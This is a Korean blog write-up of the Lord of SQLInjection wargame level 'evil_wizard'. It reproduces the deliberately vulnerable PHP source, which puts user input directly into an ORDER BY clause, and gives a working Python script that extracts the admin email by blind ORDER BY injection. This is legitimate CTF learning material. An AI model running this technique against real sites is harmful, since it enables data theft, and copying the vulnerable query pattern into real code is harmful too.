[ LOS ] Lord of SQLInjection 24번 풀이(evil_wizard)
sangjun
·2022. 1. 13. 21:36
반응형
문제소스
id email score
query : select id,email,score from prob_evil_wizard where 1 order by
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
$query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
$rows = mysqli_query($db,$query);
while(($result = mysqli_fetch_array($rows))){
if($result['id'] == "admin") $result['email'] = "**************";
echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
}
echo "</table><hr>query : <strong>{$query}</strong><hr>";
$_GET[email] = addslashes($_GET[email]);
$query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");
highlight_file(__FILE__);
?>
문제 분석 및 페이로드
1. time base, union 등등 b sqli가 안된다.
2. if문과 order by를 통해 email을 알아내자
3. if(조건, 1, 999999)를 해준다면 참일때 admin이 첫번째 컬럼으로 온다.
--> 이것으로 참과 거짓 구별 가능
import requests
import string
URL="https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kmo07vm0qujgagfi56vspjh5f8"}
passwd=""
print(brute)
length=-1
#find passwd Length
for i in range(100):
query=f"""?order=if(id='admin' and length(email)={i},1,999999)""" #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
response=requests.get(URL+query,cookies=cookies)
if response.text.find("<td>admin</td>")<response.text.find("<td>rubiya</td>"):
length=i
break
print(f"pass length is {length}")
#find passwd
for i in range(1,length+1):
for ch in brute:
query=f"""?order=if(id='admin' and ord(mid(email,{i},1))={ord(ch)},1,999999)"""
response=requests.get(URL+query,cookies=cookies)
print(query)
if response.text.find("<td>admin</td>")<response.text.find("<td>rubiya</td>"):
passwd+=ch
break
print(f"passwd is {passwd}")
반응형
'War Games > Lord of sql injection (LOS)' 카테고리의 다른 글
| [ LOS ] Lord of SQLInjection 26번 풀이(red_dragon) (0) | 2022.01.14 |
|---|---|
| [ LOS ] Lord of SQLInjection 25번 풀이(green_dragon) (0) | 2022.01.13 |
| [ LOS ] Lord of SQLInjection 24번 풀이(evil_wizard) (0) | 2022.01.13 |
| [ LOS ] Lord of SQLInjection 23번 풀이(hell_fire) (0) | 2022.01.12 |
| [ LOS ] Lord of SQLInjection 22번 풀이(dark_eyes) (2) | 2022.01.12 |
| [ LOS ] Lord of SQLInjection 21번 풀이(iron_golem) (0) | 2022.01.12 |
0개의 댓글